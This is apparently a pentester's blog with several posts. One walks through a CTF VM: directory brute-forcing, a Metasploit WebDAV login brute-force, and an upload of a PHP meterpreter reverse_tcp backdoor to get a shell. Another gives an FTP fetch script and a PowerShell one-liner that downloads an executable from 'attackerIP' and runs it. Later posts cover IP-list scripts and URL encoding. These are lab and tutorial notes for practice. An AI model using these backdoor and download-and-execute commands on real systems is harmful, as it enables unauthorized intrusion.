Sharpening your knife

From time to time we all go through periods of lulls. In most cases, it may be work or personal related, but I always feel that it is a good idea to keep working on your skills, even if your current job is not what you want it to be, career wise. For example, the other day I was checking LinkedIn and came across a post about a new “CTF” VMware framework on one of the Pentesting groups I belong to. It was touted as a victim machine that had a simple and more “advanced” version, however I think the VM I downloaded was fairly straight forward. More or less, I used it as an excuse to play around and “sharpen my knife”.

After downloading the VM, I was presented with fairly simple webpage that displayed “images”, basically it was some sort of photo album. The album allowed you to search images, register a new user, and login/logout. After scanning the system with Nmap, I found no additional ports besides SSH and HTTP. So I then proceeded to perform basic web attacks (e.g. XSS, SQLi, Command Injection, etc.). After trying some of those basic attacks, I started to think about, what if this wasn’t the actual “vulnerable” site, but just a decoy. I pulled up my trusty go-to tool, dirbuster. If you have not used dirbuster, it basically allows you to “brute-force” file and folder locations.

dirbus1

After letting dirbuster do its thing, I was intrigued by the directory “/webdav/” and was presented with a login prompt. I tried a few simple user/passwords combinations (e.g. admin/admin, admin/password, etc.).

webdav

After a few failed attempts, I decided to use the metasploit “auxiliary/scanner/http/http_login” module to see if I can find a correct pair. I have a few word-lists that I use, but in this case you can use the defaul MSF lists.

httplogin

BAM!!! We find a successful user/password.

success

After logging-in we are presented with a blank page.

webdav2

So I decided to use cadaver to login and see what we can do with the server.


cadaver http://192.168.1.12/webdav/

Once I was in, I wanted to see if I had full permissions to upload a file. I did a “mkcol test”, which made a collection named test. Now we can make a backdoor and see if we can get a shell on the box. Using MSF, I made a php backdoor.

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=80 R > backdoor.php

Then back in the cadaver window, I issued “put /root/ods/backdoor.php” command to upload it to the server. Now we can setup metasploit to catch our payload using “multi handler”, browsed to the file and we have a session…simple as that.

session

Nothing super ground breaking, but going through the process of learning new environments, will only help you “sharpen your knife”. You can learn more about the people that made this VM, here and can download the VM, here.

*sighs*, just for my records

I am reading the RTFM and I am slowly adding a lot of one-liners and random things to my toolkit. On older systems you can easily download files to and from your targets using ftp, on most newer OS’s (Win 7, 2008/2012, etc.), FTP is not installed or allowed by default.

For example, you can create a simple ftp script and then run it with “ftp -s:ftp.txt”:

open yourattackserver
username
password
get bd.exe
bye

However, this does not work on some modern systems, even if you use the interactive settings “-i or -n”. Well, lucky for us, we can use powershell.

powershell -command ” & { (New-Object System.Net.WebClient).DownloadFile(‘http://attackerIP/bd.exe’,’C:\Users\Public \Downloads\bd.exe’);Start-Process ‘C:\Users\Public\Downloads\bd.exe’}”

Again, this is nothing new or fancy, I just wanted to share. I am not sure if this is in the RTFM, I am pretty sure I just got lazy and didn’t look. As I write this, I just found this post from a few years ago. So yeah…nothing new. haha!

Dealing with huge IP Lists

So, every once in a while I have odd requests from customers to do silly things. For example, I was on an engagement a few months ago, and my customer wanted me to scan 6 computers at a time. At first, I thought to myself, I am not going to scan 6 computers at a time, that would take forever and you are stupid. Then, I thought, hmmm..maybe I can at least figure out something to make it worth my while. One of the first obstacles I had to overcome is the fact that I have several input lists that had 100’s of IP addresses in them. I wrote a small python script to take a list of IP addresses and sort them and save them into a new file. This was not necessary, but if you are anal about certain things like I am, its easier for me to have just one list that is nice and neat. Of course, you can do this with sort, awk, etc. but I wanted an excuse to write more in python. The second obstacle I had to overcome is how to create several lists from this new file and create a billion smaller files with each with 6 IP addresses. So, I wrote a script that will take your IP file and a “number” and then create files each with that “number” of IP addresses in them.

./ipsplit.py <br>
Usage: ./ipsplit.py (Inputfile) (size)
<br>
./ipsort.py <br>
Usage: ./ipsort.py (ipList file) (outputfile)

Nothing super technical or ground breaking, but it works. Both scripts can be found on my github.

URL Encoding

URL Syntax

https://admin:pass123@www.example.com:80/bio.txt;pp=1&qp=2#Three

URL Part URL Data
Scheme https
User admin
Password pass123
Subdomain www
Domain example.com
Port 80
Path /bio.txt
Path Parameter pp=1
Query Parameter qp=2
Fragment Three

Safe Characters

RFC1738 section 2.2 outlines the safe characters to use in an HTTP URL Scheme:

abcdefghijklmnopqrstuvwxyz0123456789$-_.+!*'(),

Safe characters can be used in URLs without any form of encoding as they aren’t reserved for special use in the construction of the URL.

Unsafe Characters

Per RFC1738 section 2.2, the following characters are unsafe for use in an HTTP URL Scheme:

space < > " # % { } | \ ^ ~ [ ] `

RFC1738 section 2.2 also states that the following characters are reserved in an HTTP URL Scheme:

; / ? : @ = &

RFC3986 section 2.2 additionally specifies reserved characters in URI schemes:

space % : / ? # [ ] @ ! $ & ' ( ) * + , ; =

Unsafe and reserved characters are reserved for use in constructing the URL scheme. These characters must be encoded so the URL can be constructed without ambiguity. Fortunately, RFC1738 has us covered.

URL Encoding

URL, or percent, encoding substitutes the percent (%) sign and two hexadecimal characters to represent unsafe characters in a URL. Here are the encodings for unsafe and reserved characters per RFCs 1738 and 3986:

Unsafe Character URL(Percent) Encoding
space %20
% %25
: %3A
/ %2F
? %3F
# %23
[ %5B
] %5D
@ %40
! %21
$ %24
& %26
%27
( %28
) %29
* %2A
+ %2B
, %2C
; %3B
= %3D
< %3C
> %3E
%22
{ %7B
} %7D
pipe %7C
\ %5C
^ %5E
~ %7E
` %60

URL Encoding “Gotchas”

Stéphane Épardaud describes several pitfalls to URL encoding at the Lunatech Blog (go read his post!). In summary, reserved characters differ for each part of the URL:

Path

  • spaces must be encoded to %20, not +
  • : @ - . _ ~ ! $ & grave ( ) * + , ; = are allowed unencoded

Path Parameter

  • = is allowed unencoded

Query

  • spaces may be encoded to + (for backward compatibility) or %20. + must be encoded to %2B
  • ? , / are allowed unencoded

Fragment

  • / ? : @ - . _ ~ ! $ & grave ( ) * + , ; = are allowed unencoded

For more information

  1. RFC1738 – Uniform Resource Locators
  2. RFC3986 – Uniform Resource Identifiers
  3. What every web developer must know about URL encoding